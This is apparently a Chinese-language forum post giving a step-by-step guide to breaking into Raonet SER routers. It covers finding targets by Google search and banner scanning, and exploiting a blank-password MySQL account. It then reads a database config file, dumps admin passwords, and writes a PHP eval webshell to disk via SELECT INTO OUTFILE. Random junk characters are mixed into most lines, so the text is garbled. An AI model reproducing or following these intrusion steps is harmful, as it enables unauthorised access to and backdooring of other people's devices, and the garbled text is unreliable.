寻找存在漏洞的路由器方法:& m7 s- V; w1 F
4 c8 c0 V W) P1:google搜索'Raonet Subscriber Ethernet Router'
! J: C" D' Q7 E0 R7 q, ?
. x0 v0 S1 g5 A" K6 ?; c1 k. ]+ Z2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
: g: u0 z2 m W, j) R6 l* K$ ?6 d3 r
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
1 v1 }, t7 M6 @. `8 @
2 v0 M, {+ ?) M3 p: W7 n//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
- Y3 R; q* b6 W) V/ W0 o' z: |
% \& w4 `- S8 y8 t0 N; R
) ?/ b l. e9 v3 D, K- I
8 |# w( {3 G' t+ }7 I1 m( M: B5 h入侵步骤:- f+ I, H. U2 C: o- p
8 u$ g' W: s! Z% ^" Z" ?8 [: T1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
; r* r8 V2 X- G+ _/ ^4 @% I7 o1 [/ j) L3 b" d
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc3 c2 ^) |# b" a6 a
3:得到密码后连接,查看GUI管理密码:
* \9 { o: ^- ~3 e% c7 `" ouse ser_500
2 \$ R2 ^1 k# c/ Gselect id,passwd from user;" \: l* {; R* P/ F2 z! M
4:通过数据库写入webshell,执行命令:3 M# P" \' e. ~. |' X8 {
use mysql;
" t, K8 ]! X$ {/ u) N* screate table ok(cmd TEXT);5 V, q7 ?' T' i
insert into ok values("<?php @eval($_POST[cmd])?>");1 D; @1 I/ [4 y) q. O+ C' q
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";- M5 \! }( Q/ p/ h
drop table ok;. b& O2 C: J! I$ [5 c* M" v
" d- }. {( N9 {5 `! e/ U8 S2 y/ `5:连接后门shell.php % F. {9 |& b7 Z# s
. f; b" q: P6 V) d" r: B3 g3 a6. 搞定!
& e4 Y3 w. ?& Q7 L- d
' H, Y& `! v! e6 R |